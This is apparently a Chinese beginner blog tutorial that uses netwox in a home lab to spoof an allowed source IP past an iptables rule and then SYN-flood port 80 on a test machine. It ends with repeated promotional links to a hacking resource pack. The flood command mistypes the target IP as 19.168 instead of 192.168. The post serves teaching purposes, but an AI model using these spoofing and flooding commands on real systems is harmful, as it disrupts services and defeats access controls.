前言
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段dos与ddos渗透与防御第1篇。
喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。
-
靶机:seedubuntu 12.01,IP:192.168.199.134
-
攻击机:Kali-2020.4,IP:192.168.199.129
-
工具:netwox
IP地址欺骗
靶机开启tcpdump监听
sudo tcpdump -i eth0 tcp port 80 -n -nn
配置防火墙,伪造许可的规则,222是我们伪造的ip
sudo iptables -A INPUT -i eth0 -s 192.168.199.222/32 -j ACCEPT
sudo iptables -A INPUT -i eth0 -p all -j DROP
在Kali上利用netwox进行IP地址欺骗,伪装成192.168.199.222,突破防火墙限制
netwox 52 -E "0:1:2:3:4:5" -I "192.168.199.222" -e "00:0c:29:6f:6a:d5" -i "192.168.199.134"
-
-I:伪造的IP
-
-e:靶机MAC
-
-i:靶机IP
dos攻击
syn flood是建立在IP源地址欺骗之上的攻击
netwox 76 -i 19.168.199.134 -p 80
此时靶机的80端口会接收到大量不同来源的syn包
使用netstat查看连接情况,在防火墙的作用下攻击并未成功
netstat -antu | grep :80
接下来把防火墙关了,攻击成功,此时存在大量的syn半连接
iptables -F
iptables -X
netstat -antu | grep :80
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
